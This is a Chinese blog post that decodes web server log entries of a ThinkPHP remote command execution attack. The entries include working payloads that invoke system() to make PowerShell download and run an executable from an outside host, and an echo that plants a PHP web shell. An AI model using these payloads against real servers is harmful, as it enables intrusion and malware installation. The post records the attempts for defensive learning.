2019年2月19日 星期二

從 Web Log 學習系統漏洞 35

ThinkPHP 遠端命令執行漏洞

解碼後所執行的指令:
1. /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/10.exe');start C:/10.exe
2. /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php $action = $_GET['xcmd'];system($action);?^>>hydra.php
3. /public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/10.exe');start C:/10.exe


不曉得為什麼要下載兩次同樣的東西?


41.228.75.23 - - [18/Feb/2019:21:49:44 +0800] "GET /public/index.php?s=index/think%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/10.exe');start%20C:/10.exe HTTP/1.1" 404 214 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
41.228.75.23 - - [18/Feb/2019:21:49:45 +0800] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=echo%20%5E%3C?php%20$action%20=%20$_GET%5B'xcmd'%5D;system($action);?%5E%3E%3Ehydra.php HTTP/1.1" 404 214 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
41.228.75.23 - - [18/Feb/2019:21:49:45 +0800] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/10.exe');start%20C:/10.exe HTTP/1.1" 404 214 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"


沒有留言:

張貼留言